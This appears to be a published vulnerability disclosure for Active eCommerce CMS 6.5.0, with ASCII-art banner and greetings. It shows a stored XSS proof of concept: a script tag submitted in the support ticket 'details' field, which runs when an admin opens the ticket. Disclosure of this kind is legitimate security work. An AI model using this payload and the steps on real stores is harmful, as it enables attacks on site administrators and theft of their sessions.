Active eCommerce CMS version 6.5.0 suffers from a persistent cross site scripting vulnerability.
066a6369e498fa088914ac661b208cfdd01fc42dc04688bd48a485b5fda514c6
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://activeitzone.com/active-ecommerce-cms/ │
│ Vendor : Active It Zone │
│ Software : Active eCommerce CMS 6.5.0 │
│ Vuln Type: Stored XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│ information, manipulate data, and launch additional attacks. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
## Stored XSS
------------------------------------------------------------
POST /ecommerce/support_ticket HTTP/2
Content-Disposition: form-data; name="details"
<script>alert(1)</script>
------------------------------------------------------------
POST parameter 'details' is vulnerable to XSS
## Steps to Reproduce:
1. Login (as User) "Normal User"
2. Go to [Support Ticket] on this Path (https://website/support_ticket)
3. Click [Create a Ticket]
4. Inject your [XSS Payload] in "Provide a detailed description"
5. Send Ticket
6. When ADMIN Visit [Support Desk] .. [Ticket] to Check [New Tickets] in Administration Panel on this Path (https://website/admin/support_ticket)
7. The ADMIN will click on the [Eye Icon] to View Details and Read The Ticket
8. XSS will Fire & Executed on his Browser
[-] Done